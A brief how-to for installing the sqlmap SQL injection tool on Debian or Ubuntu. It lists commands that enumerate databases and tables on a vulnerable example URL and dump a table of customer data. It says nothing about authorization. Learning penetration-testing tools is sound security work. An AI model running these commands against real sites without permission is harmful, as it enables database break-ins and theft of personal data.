How To Install sqlmap on Debian (or Ubuntu)

sqlmap is an open-source pentesting tool that automates the exploitation of SQL injection flaws.

The tool makes it pretty easy for anyone with basic command line knowledge to exploit and break into databases.


Installation

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

To list available options:

python sqlmap.py -h

Fetch database names of vulnerable url:

python sqlmap.py -u www.example.com/home.php?ID=10 --dbs

Enumerate tables of a website's database (e.g.: test)

python sqlmap.py -u www.example.com/home.php?ID=10 -D test --tables

Dump all data in database (test) and table (e.g.: costumer_data)

python sqlmap.py -u www.example.com/home.php?ID=10 -D test -T costumer_data --dump

More examples are available here: https://gist.github.com/stamparm/5335217

Read More